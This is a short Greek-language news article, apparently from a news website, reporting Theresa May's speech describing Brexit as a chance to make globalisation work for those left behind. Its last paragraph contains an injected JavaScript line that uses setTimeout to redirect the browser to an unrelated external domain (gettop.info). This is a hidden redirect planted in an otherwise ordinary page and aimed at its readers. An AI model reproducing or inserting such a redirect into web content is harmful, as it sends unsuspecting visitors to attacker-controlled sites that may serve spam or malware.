Μέι: Μήνυμα προς τις παγκόσμιες ελίτ το Brexit

0
4

 

Ως «ιστορική ευκαιρία» να γίνει σωστή διαχείριση των δυνάμεων της παγκοσμιοποίησης για να λειτουργεί προς όφελος όλων και για να δειχθεί ότι η Βρετανία μπορεί να ηγηθεί της αντιμετώπισης των μεγαλύτερων προκλήσεων του καιρού μας, χαρακτήρισε το Brexit η πρωθυπουργός της χώρας Τερέζα Μέι σε επίσημο δείπνο στο Σίτι του Λονδίνου.

Η κ. Μέι είπε ότι η παγκοσμιοποίηση έχει κάνει πολλούς πολίτες του δυτικού κόσμου να αισθάνονται απομονωμένοι, με αποτέλεσμα εντάσεις και απαιτήσεις για αλλαγή.

Όπως ανέφερε: «Οι δυνάμεις του φιλελευθερισμού και της παγκοσμιοποίησης που έχουν κυρίαρχο ρόλο στη Βρετανία, στην Αμερική και σε όλο το δυτικό κόσμο εδώ και χρόνια, έχουν αφήσει υπερβολικά πολλούς ανθρώπους πίσω.

»Όταν αρνείσαι να αποδεχθείς ότι η παγκοσμιοποίηση υπό την παρούσα μορφή της έχει αφήσει πολλούς ανθρώπους πίσω, δε σπέρνεις τους σπόρους για την ανάπτυξή της, αλλά για τη διάλυσή της».

Η κ. Μέι σημείωσε ότι «μια αλλαγή βρίσκεται στον αέρα», με εμφανείς τις εντάσεις και τις διαφορές μεταξύ των κερδισμένων από την παγκοσμιοποίηση και όσων νιώθουν ότι δε μετέχουν των οφελών αυτής. Όπως σημείωσε,«οι τελευταίοι βλέπουν την ανάδειξη μίας νέας παγκόσμιας ελίτ που κάποιες φορές μοιάζει να παίζει με διαφορετικούς κανόνες».

Ο ρόλος των επιχειρήσεων στην αποκατάσταση της εμπιστοσύνης των πολιτών στις ελεύθερες αγορές και στη βοήθεια προς τους χαμένους της παγκοσμιοποίησης είναι κρίσιμος, είπε η Βρετανίδα Πρωθυπουργός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here